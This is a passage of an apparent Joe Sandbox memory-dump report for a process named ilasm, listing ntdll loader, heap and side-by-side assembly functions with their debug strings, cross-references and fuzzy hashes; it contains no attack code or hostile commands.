Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 033bfd033a604ff4e379a170203adf0b8ef1949e3c1ca9e93a17cce55672637d
Instruction ID: 0e347b1088b941b87492d7190fcbab1188f14e77b9504323ccdae14050a4d429
Opcode Fuzzy Hash: 033bfd033a604ff4e379a170203adf0b8ef1949e3c1ca9e93a17cce55672637d
Instruction Fuzzy Hash: D1D11631618684DFCB26DF68C489ABDBBF2FF45704F088899E446BB251C774EA81CB54

Function 05BBADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON

Download Yara Rule

Strings

LdrpResSearchResourceMappedFile Exit, xrefs: 05BBAECC
J, xrefs: 05BBAEAE
MZER, xrefs: 05C136A8
H, xrefs: 05BBAEC2
MUI, xrefs: 05BBB410
#, xrefs: 05C1363D
LdrpResSearchResourceMappedFile Enter, xrefs: 05BBAEB8

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
API String ID: 0-664215390
Opcode ID: 1259aa36d13c205db3b2a958a2d5726446f919da87754343baf3ff14dc1e8eb1
Instruction ID: d1aceca02234c12db2bada4d601a0da91cac1317536728a0d2422b07f3f2bb68
Opcode Fuzzy Hash: 1259aa36d13c205db3b2a958a2d5726446f919da87754343baf3ff14dc1e8eb1
Instruction Fuzzy Hash: 8932AF70A442698BEF21CB14C898BFEB7B6FF45744F1045E9E849A7250D7F1AE818F44

Function 05BE2F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON

Download Yara Rule

Strings

SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 05C22856
SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 05C22881
SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 05C229B1
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 05C228B2
RtlpProbeAssemblyStorageRootForAssembly, xrefs: 05C229AC
@, xrefs: 05BE3180
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 05C2292E

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
API String ID: 0-541586583
Opcode ID: dda5299efe9b96e59024a63fe44ffe958c95b64bcb20c41ac4603e455ffaac99
Instruction ID: 3d3d83d5ea107c8f391584a88634803fffe27e37b9c124a44876f85ba09e4d06
Opcode Fuzzy Hash: dda5299efe9b96e59024a63fe44ffe958c95b64bcb20c41ac4603e455ffaac99
Instruction Fuzzy Hash: 4FC1BD75A402299BDB21DF19CC89BBAB7F5FF44700F1444E9E949AB250E734AE80CF91

Function 05C389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDlls, xrefs: 05C38CBD
AVRF: -*- final list of providers -*- , xrefs: 05C38B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 05C38A3D
HandleTraces, xrefs: 05C38C8F
VerifierFlags, xrefs: 05C38C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 05C38A67
VerifierDebug, xrefs: 05C38CA5

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 660f48d47487057339384ecf06eded4de717b56d35a659d7a1f2a9216e13411e
Instruction ID: 71def9c96810c6aa3340a1fbf14e6fe6c87661b05197bbde539002279a491619
Opcode Fuzzy Hash: 660f48d47487057339384ecf06eded4de717b56d35a659d7a1f2a9216e13411e
Instruction Fuzzy Hash: 4C9136B264630AAFCB11DF689887F6B7BA5BB44618F044D98F9416B250D7B0ED01C7D1

Function 05C34DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON

Download Yara Rule

Strings

Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05C34DF5
minkernel\ntdll\ldrutil.c, xrefs: 05C34E06
Execute '.cxr %p' to dump context, xrefs: 05C34EB1
LdrpGenericExceptionFilter, xrefs: 05C34DFC
***Exception thrown within loader***, xrefs: 05C34E27
Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05C34E38
LdrpProtectedCopyMemory, xrefs: 05C34DF4

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
API String ID: 0-2973941816
Opcode ID: 994eaf38d4d2baab514953ca5b02129fc13094c9aa61c837b5c8a8043391478b
Instruction ID: 4fc742bacf56aac13a984e02d21dee4ca6dbfb16e9f891bb0ecfd628059050dd
Opcode Fuzzy Hash: 994eaf38d4d2baab514953ca5b02129fc13094c9aa61c837b5c8a8043391478b
Instruction Fuzzy Hash: F9213B732481097BDF2C966C8CCFE36FBA9FB81964F140D51F122A6590C960FF05D261

Function 05BE63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05C240E9, 05C2414B, 05C2420F, 05C24269
Process initialization failed with status 0x%08lx, xrefs: 05C2413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 05C241FE
Delaying execution failed with status 0x%08lx, xrefs: 05C24258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 05C240D8
_LdrpInitialize, xrefs: 05C240DF, 05C24141, 05C24205, 05C2425F

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 607dc28f1175e81d836ae2e0d93cd6f2bd7e583a6de8209eb8f4c5dc9ebf6618
Instruction ID: 71963878997491d2f9b0ef969aad77640dd1be77a41d0f0ba0b8e672dfff3df0
Opcode Fuzzy Hash: 607dc28f1175e81d836ae2e0d93cd6f2bd7e583a6de8209eb8f4c5dc9ebf6618
Instruction Fuzzy Hash: F0912830F003659BDF29DF54E989B7A7FB1BB50B18F0845A8E4126B280DB74B841DBD1

Function 05BE2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON

Download Yara Rule

Strings

\WinSxS\, xrefs: 05BE2E23
SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 05C2276F
@, xrefs: 05BE2E4D
SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 05C22706
SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 05C2279C
.Local\, xrefs: 05BE2D91

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
API String ID: 0-3926108909
Opcode ID: 87a7fbbe7981945ce53f8a3788d609b4b1379b7977da0aa00948f2e72253fae9
Instruction ID: 074edb6f5b0d533d5a9bdf4ce5bb25b93c1bb03b21f64e670d729693042244dc
Opcode Fuzzy Hash: 87a7fbbe7981945ce53f8a3788d609b4b1379b7977da0aa00948f2e72253fae9
Instruction Fuzzy Hash: 4581BA796083419FDB11CF28C895A6BBBE9FF85700F08899DF985CB251D770E944CBA2

Function 05BA645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05C09A11, 05C09A3A
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05C09A2A
apphelp.dll, xrefs: 05BA6496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 05C09A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 05C099ED
LdrpInitShimEngine, xrefs: 05C099F4, 05C09A07, 05C09A30

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 6914dbfe360979533bfd5a3bde9c1364fce45d69120c8b6be452b4eb63cee7dd
Instruction ID: 26d69eefe3ad860d15a81d9c1cfac304d0ac0ccef7b6d7abae4da7ebe3471d4a
Opcode Fuzzy Hash: 6914dbfe360979533bfd5a3bde9c1364fce45d69120c8b6be452b4eb63cee7dd
Instruction Fuzzy Hash: 6051E1727183049FD725DF64C846B6BBBE9FB84B44F040969F5859B1A1DA30F904CB92

Function 05BEC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05BEC6C3
LdrpInitializeImportRedirection, xrefs: 05C28177, 05C281EB
Loading import redirection DLL: '%wZ', xrefs: 05C28170
LdrpInitializeProcess, xrefs: 05BEC6C4
minkernel\ntdll\ldrredirect.c, xrefs: 05C28181, 05C281F5
Unable to build import redirection Table, Status = 0x%x, xrefs: 05C281E5

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: b53c95f1f2eda4a01ae67f51b413fea234469eeb3ce16ab2b3c112693e8c960d
Instruction ID: 31e8fba8d284404cf626948aaed0c5426fa993871f988cf665fa13566b275eb9
Opcode Fuzzy Hash: b53c95f1f2eda4a01ae67f51b413fea234469eeb3ce16ab2b3c112693e8c960d
Instruction Fuzzy Hash: 4D3107717483559FC314EF68D94AE2BBBE5EF84B14F040998F845AB291EB20FD04D7A2

Function 05BE2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 05C221BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 05C2219F
RtlGetAssemblyStorageRoot, xrefs: 05C22160, 05C2219A, 05C221BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05C22178
SXS: %s() passed the empty activation context, xrefs: 05C22165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05C22180

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 99704d095c6057146daa434871c48cd64826abef368d80dd167e400b30758550
Instruction ID: b489f70094c0201e3fbd52e1f3d738c38d664f820f3d3926cf9f9d70d4f11560
Opcode Fuzzy Hash: 99704d095c6057146daa434871c48cd64826abef368d80dd167e400b30758550
Instruction Fuzzy Hash: 3F317C3AF4022477EB21CA968C85F6FB7BDEF51A40F0804A8BA01B7110D770BE01D7A1

Function 05BF096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 05BF2DF0: LdrInitializeThunk.NTDLL ref: 05BF2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05BF0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05BF0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05BF0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05BF0D74

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 5f458874b97b2a0e930ca8b390e794e88b37f758d5a07d8e3d02cbd609a30d44
Instruction ID: 176ff9aff4ef1f95402de8b2893713b887aa251306963c3b6aeece7e0d21f8c3
Opcode Fuzzy Hash: 5f458874b97b2a0e930ca8b390e794e88b37f758d5a07d8e3d02cbd609a30d44
Instruction Fuzzy Hash: E6427E75A00719DFDB21DF28C845BAAB7F5FF04310F1445A9EA8ADB251D770AA88CF60

Function 05C34F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

.Local, xrefs: 05C35170
/, xrefs: 05C34F6D
.DLL, xrefs: 05C350C7, 05C3519C
\microsoft.system.package.metadata\Application, xrefs: 05C35158
\, xrefs: 05C34F66

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: 01c967afc1bceed623de71957fc3dc7b06e4974daff49c9dbbf0738d87a6c173
Instruction ID: fe71c53c794a05b2e594de64a5c705c3d65e62606f4d4cd5e646be4d95f09e2a
Opcode Fuzzy Hash: 01c967afc1bceed623de71957fc3dc7b06e4974daff49c9dbbf0738d87a6c173
Instruction Fuzzy Hash: F791C276E00619DBCB25CF99C882ABEB7B1FF48310F5945A9E811E7350E735EA01CB90

Function 05BBA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 05BBA3EF
LdrResFallbackLangList Exit, xrefs: 05BBA3FF
8, xrefs: 05BBA3E7
6, xrefs: 05BBA3F7

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: c7195c38fff5f859c422901d7b6f1c5f45924998a65c76e2240afb7c1103b8cf
Instruction ID: b3ccd2dc532e1c5da7e5ca334720c1c6a7eab439b3d102f8a7db0032285bb98a
Opcode Fuzzy Hash: c7195c38fff5f859c422901d7b6f1c5f45924998a65c76e2240afb7c1103b8cf
Instruction Fuzzy Hash: E0C1AE789083869FE711CF15C044BBAB7E5FF84304F0048A9F9868B250E7F4EA49CB56

Function 05BE8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05BE8421
LdrpInitializeProcess, xrefs: 05BE8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 05BE855E
@, xrefs: 05BE8591

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 64949323b9d2979dcae2072cef53313a598933688a3ffa0d76030524b55bffb0
Instruction ID: e28e818e7b85dac6d3a07b164e6d7a4d42989dffddc37d76b564a36777f893a7
Opcode Fuzzy Hash: 64949323b9d2979dcae2072cef53313a598933688a3ffa0d76030524b55bffb0
Instruction Fuzzy Hash: EB91B971608744AFD721EF65CC45FBBBAE8FB88744F4409AEFA8496050E730E905CB62

Function 05BC0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 05C154ED
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 05C155AE
HEAP[%wZ]: , xrefs: 05C154D1, 05C15592
HEAP: , xrefs: 05C154E0, 05C155A1

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: e2a145b1719e59d5a3424ad922ccdf5b7ea3d6776e7f318062c4a7e3b14a3467
Instruction ID: 518e374173359884297d5cdfcbc3ebe05de14d697a5c77947234c16eb50d4342
Opcode Fuzzy Hash: e2a145b1719e59d5a3424ad922ccdf5b7ea3d6776e7f318062c4a7e3b14a3467
Instruction Fuzzy Hash: 8AA1F37460820AEFD724EF24C449BBABBE2FF45700F1485EDD8968B681D734B844DB94

Function 05BE273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 05BE28D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 05C221D9, 05C222B1
SXS: %s() passed the empty activation context, xrefs: 05C221DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 05C222B6

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 3e803f7134b83840d690b0d2f6a5edd1a6f5760f295deca206fb6767566a19f3
Instruction ID: 2ee61ec677f54f191813efe8d2a6be7dce21e58950cad319c0c17c6dacfd1315
Opcode Fuzzy Hash: 3e803f7134b83840d690b0d2f6a5edd1a6f5760f295deca206fb6767566a19f3
Instruction Fuzzy Hash: ADA1A039A45229DBCB24CF64CC88BA9B3B5FF58314F2945F9D809A7251D731AE80CF94

Function 05BB64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 05C110AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 05C1106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05C11028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05C10FE5

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 947ed658bc5b834cc6d6e9c08f64733b441352de2a6d0a1d280036b7d0465b86
Instruction ID: cd7e8664dee956ac818e27b089b0f5de5724d90744e0ba15ba8e93da3f33a270
Opcode Fuzzy Hash: 947ed658bc5b834cc6d6e9c08f64733b441352de2a6d0a1d280036b7d0465b86
Instruction Fuzzy Hash: DF71E5719043089FDB20DF14C889FAB7BA9EF45764F0408A8F9488B186D7B4E698DFD1

Function 05BE4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 05C23640, 05C2366C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 05C2362F
LdrpFindDllActivationContext, xrefs: 05C23636, 05C23662
Querying the active activation context failed with status 0x%08lx, xrefs: 05C2365C

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 9e2a916b8965e220b13096f1cefae36ac1da62ea4f411a32a3b874d7f7b8cd5d
Instruction ID: a075bfea25e165d332d11456a3009a025f6d2f91c0148a53b0ddf1d0cc257867
Opcode Fuzzy Hash: 9e2a916b8965e220b13096f1cefae36ac1da62ea4f411a32a3b874d7f7b8cd5d
Instruction Fuzzy Hash: DB312732A04251EADF31EA48C84FF76A6B5FB41A14F0EC5E6E50597160DBA4BC8086D5

Function 05BD245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 05C1A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 05C1A992
apphelp.dll, xrefs: 05BD2462
LdrpDynamicShimModule, xrefs: 05C1A998

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 6fc3e11e2cc36c68f579664621b4117c370a2c81480445d5907ed8ec3193c2ca
Instruction ID: 2f2e7e2f8bcbdfce11d6e9f7afc3e7e53318200e079de4e985794e364c440799
Opcode Fuzzy Hash: 6fc3e11e2cc36c68f579664621b4117c370a2c81480445d5907ed8ec3193c2ca
Instruction Fuzzy Hash: 02313731A10241ABDB21DF988C86F7EFFB5FB85B08F154859FD01AB250DAB06981DBD0

Function 05BC29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 05BC327D
HEAP[%wZ]: , xrefs: 05BC3255
HEAP: , xrefs: 05BC3264

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 7410bacad44cd050d478a4d6561a45d1e6f7ca5e5c5ef343ff7fb2e21c80dfe4
Instruction ID: 7a32b1c254dee7c3440d136e5749830abf062bbe2b0a7d7c17269e5090b8b7ec
Opcode Fuzzy Hash: 7410bacad44cd050d478a4d6561a45d1e6f7ca5e5c5ef343ff7fb2e21c80dfe4
Instruction Fuzzy Hash: 9692AB75A042499FDB25CF68C444BAEBFF2FF48300F1884EDE89AAB251D735A941CB54

Function 05BC0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 05C150CA
HEAP[%wZ]: , xrefs: 05C150AE
HEAP: , xrefs: 05C150BD

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 1223c6e4b2dcecf136e5aad0ea53d9001addc2464818462d1a5aaaf8be058085
Instruction ID: 92f6f5f0b330d577c4815a834f8c01217d9015448105045c5c083c01afd2b632
Opcode Fuzzy Hash: 1223c6e4b2dcecf136e5aad0ea53d9001addc2464818462d1a5aaaf8be058085
Instruction Fuzzy Hash: F3F19C31B00609DFDB15DF68C888B7ABBB6FB85304F1485A8E8169B351D730BA81DF94

Function 05BAA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 05C0C1E4
FilterFullPath, xrefs: 05C0C2E6
UseFilter, xrefs: 05BAA1C1

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: adfef7eae73760eb8be56563d904d0ea588c8cf37463852afb8f693ee84485c6
Instruction ID: f7e785445001ce53c21991b0d25e188523d606570e66f4b2565f043dfe56ebba
Opcode Fuzzy Hash: adfef7eae73760eb8be56563d904d0ea588c8cf37463852afb8f693ee84485c6
